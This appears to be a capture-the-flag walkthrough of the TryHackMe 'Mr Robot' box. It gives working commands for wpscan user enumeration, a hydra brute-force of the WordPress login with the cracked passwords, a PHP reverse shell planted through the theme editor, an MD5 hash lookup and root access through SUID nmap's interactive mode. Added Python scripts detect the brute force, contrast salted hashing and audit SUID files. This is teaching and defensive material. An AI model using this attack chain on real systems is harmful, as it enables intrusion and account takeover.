Mr Robot
A medium Linux box from TryHackMe: abuse a WordPress admin account for initial access, then an SUID binary for root.
Recon
Regular nmap scan
sudo nmap -sC -sV -oA nmap/mrrobot 10.10.210.134
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
Run a quick gobuster for directories and files on the web server, and see that there is a robots.txt file - a lil' on the nose.
Check robots.txt: it lists two entries, one being the first flag, the other a dictionary of strings.
wget 10.10.210.134/fsocity.dic
The dictionary is full of repeated entries, so sort and deduplicate it with
sort -u fsocity.dic > tt.txt
It will probably be useful later for brute forcing something.
Continue by enumerating users with wpscan
wpscan --url 10.10.210.134/0/ -e u
and find two users:
[i] User(s) Identified:
[+] mich05654
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] elliot
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
Exploitation
With the two usernames saved to users.txt and the deduplicated dictionary as the password list, run hydra against the WordPress login form (a successful login answers with a redirect, hence the Location check)
hydra -L users.txt -P tt.txt 10.10.210.134 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location' -t 64
[80][http-post-form] host: 10.10.210.134 login: mich05654 password: Dylan_2791
[80][http-post-form] host: 10.10.210.134 login: elliot password: ER28-0652
elliot:ER28-0652 mich05654:Dylan_2791
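From the defender's side, the hydra run above is loud: dozens of POSTs to wp-login.php from one source in seconds, each answered with a 200 (form re-rendered) until the one that gets a 302. The script below is an added example, not part of the original write-up; it parses Apache combined-format access logs, applies a sliding-window count per source IP, and flags sources that exceed an assumed threshold. The log lines are constructed inline and the window/threshold values are assumptions to tune for your site.

```python
"""Flag brute-force login attempts against wp-login.php in Apache access logs.
Added example (not from the original write-up); sample log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format, e.g.
# 10.0.0.5 - - [10/Mar/2024:14:01:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def find_login_bruteforce(lines, window=timedelta(minutes=5), threshold=20):
    """Return {ip: {"attempts": n, "success": bool}} for every source that POSTs to
    /wp-login.php more than `threshold` times inside any `window` (assumed values)."""
    posts = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"].split("?")[0] == "/wp-login.php":
            posts[ev["ip"]].append((ev["ts"], ev["status"]))

    alerts = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it fits within `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 > threshold:
                # WordPress redirects (302) on a successful login; a 200 means the
                # form was rendered again, i.e. the attempt failed.
                alerts[ip] = {
                    "attempts": len(events),
                    "success": any(status == 302 for _, status in events),
                }
                break
    return alerts


def _line(ip, ts, status, ua):
    return (f'{ip} - - [{ts.strftime(TS_FMT)}] "POST /wp-login.php HTTP/1.1" '
            f'{status} 0 "-" "{ua}"')


def sample_log():
    """Constructed log: one source hammering the login form, one normal user."""
    t0 = datetime(2024, 3, 10, 14, 1, 0, tzinfo=timezone.utc)
    lines = []
    # attacker-like source: 25 POSTs in under a minute, the last one succeeds
    for i in range(25):
        lines.append(_line("10.0.0.5", t0 + timedelta(seconds=2 * i),
                           302 if i == 24 else 200, "Mozilla/5.0 (constructed)"))
    # legitimate user: two typos and a login, spread over forty minutes
    for i, status in enumerate([200, 200, 302]):
        lines.append(_line("192.168.1.9", t0 + timedelta(minutes=20 * i),
                           status, "Mozilla/5.0 (X11; Linux x86_64)"))
    return lines


if __name__ == "__main__":
    for ip, info in find_login_bruteforce(sample_log()).items():
        print(f"{ip}: {info['attempts']} login POSTs, "
              f"{'SUCCESSFUL' if info['success'] else 'no'} login seen")
```

The "success" flag is what turns an alert from "noise" into "rotate that account now": a burst of failures followed by a 302 from the same source is exactly the shape of the hydra run above. On a real deployment the same logic can feed fail2ban or a WAF rule, and a login rate limit on wp-login.php removes the problem at the source.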
Both logins crack. Try elliot's first, since he is probably the admin of the Mr Robot box.
Elliot is indeed the admin, so plant a PHP reverse shell through the WordPress theme editor by replacing the contents of 404.php and saving the changes.
Navigate to 10.10.210.134/0/ to trigger the 404 page, and catch the reverse shell on a listener.
On the box, look in /home and see a robot user with two files in its home directory:
key-2-of-3.txt password.raw-md5
The flag isn't readable as the web server user, but the password hash is:
cat password.raw-md5
c3fcd3d76192e4007dfb496cca67e13b
Looking the unsalted MD5 up in a rainbow table gives the password abcdefghijklmnopqrstuvwxyz
robot:abcdefghijklmnopqrstuvwxyz
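The hash fell to a lookup because it is a single unsalted MD5 of the password: anyone can hash a wordlist once and reuse the table against every such hash they ever find. The script below is an added example, not from the original write-up; it reproduces the lookup against a small constructed wordlist (confirming the digest above) and then shows the storage form that defeats it, a salted, iterated PBKDF2-HMAC-SHA256 hash via the standard library. The iteration count is an assumed value.

```python
"""Unsalted MD5 lookup versus a salted, slow password hash.
Added example (not from the original write-up); the wordlist is constructed."""
import hashlib
import hmac
import os

# constructed wordlist; real ones are millions of entries
WORDLIST = ["password", "letmein", "abcdefghijklmnopqrstuvwxyz", "qwerty"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def build_lookup(words):
    """hash -> word.  Computed once, it answers any unsalted MD5 forever, which is
    why password.raw-md5 on this box was effectively plaintext."""
    return {md5_hex(w): w for w in words}


def lookup(digest, table):
    return table.get(digest.strip().lower())


# --- the alternative: a per-user random salt and a deliberately slow KDF ---
def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Return 'salt$iterations$dk' (hex).  600k iterations is an assumed value."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def pbkdf2_verify(password, stored):
    salt_hex, iterations, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison so verification timing leaks nothing
    return hmac.compare_digest(dk.hex(), dk_hex)


def stored_hashes_differ(password):
    """Two accounts with the same password get different stored values, so a
    precomputed table cannot be built for the salted scheme."""
    return pbkdf2_hash(password) != pbkdf2_hash(password)


if __name__ == "__main__":
    table = build_lookup(WORDLIST)
    print("md5 lookup:", lookup("c3fcd3d76192e4007dfb496cca67e13b", table))
    stored = pbkdf2_hash("abcdefghijklmnopqrstuvwxyz")
    print("pbkdf2 record:", stored)
    print("verify ok:", pbkdf2_verify("abcdefghijklmnopqrstuvwxyz", stored))
    print("same password, different record:", stored_hashes_differ("hunter2"))
```

The two halves make the point side by side: one MD5 per candidate, computed once, cracks every unsalted hash of that password ever stored; with a 16-byte random salt and a slow KDF the table has to be rebuilt per account and each guess costs hundreds of thousands of hash operations.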
Switch user to robot with that password and read the second flag.
Now, to escalate to root, search for SUID-enabled binaries:
find / -perm -u=s -type f 2>/dev/null
And see nmap on the list
/usr/local/bin/nmap
This is an older nmap build that still supports interactive mode, and since it is SUID root anything it executes runs as root, so spawn it interactively
nmap --interactive
Then inside the prompt, run !sh to get a root shell
nmap> !sh
# whoami
root
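The find command above is also how a defender catches this: an SUID root binary that is not part of the base install is a finding. The script below is an added example, not from the original write-up; it walks a tree for files with the setuid bit set (the same thing `find / -perm -u=s -type f` does), diffs them against an allowlist, and reports anything extra. The allowlist is an assumption (derive the real one from a known-good build of the same image), and the demo tree it audits is constructed in a temporary directory.

```python
"""Audit SUID binaries against an allowlist so a stray one like /usr/local/bin/nmap
stands out.  Added example (not from the original write-up); the allowlist is an
assumed baseline and the demo tree is constructed."""
import os
import stat
import tempfile

# assumed baseline: binaries that legitimately need setuid-root on this build
ALLOWLIST = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
             "/bin/mount", "/bin/umount"}


def find_suid(root):
    """Regular files under `root` with the setuid bit set (equivalent of
    `find ROOT -perm -u=s -type f`)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root, allowlist=ALLOWLIST, strip_prefix=""):
    """SUID files under `root` that are not on the allowlist.  `strip_prefix`
    lets a staged tree (a mounted image, a chroot) be compared as if it were /."""
    unexpected = []
    for path in find_suid(root):
        logical = path[len(strip_prefix):] if strip_prefix and path.startswith(strip_prefix) else path
        if logical not in allowlist:
            unexpected.append(logical)
    return unexpected


def build_demo_tree():
    """Constructed tree: two expected SUID binaries, one non-SUID file, and a
    stray SUID nmap like the one on this box."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    layout = [("usr/bin/passwd", True), ("usr/bin/sudo", True),
              ("usr/bin/ls", False), ("usr/local/bin/nmap", True)]
    for rel, suid in layout:
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")  # placeholder content, not a real binary
        os.chmod(path, 0o4755 if suid else 0o755)
    return base


if __name__ == "__main__":
    base = build_demo_tree()
    print("all SUID files:", find_suid(base))
    print("not on allowlist:", unexpected_suid(base, strip_prefix=base))
```

Run against a live host as `unexpected_suid("/")` (with an allowlist captured from a clean build) and schedule it, or feed the output to your file-integrity monitoring; an unexpected entry such as a hand-installed nmap with the setuid bit is exactly the privilege-escalation path used above, and removing the bit with `chmod u-s` closes it.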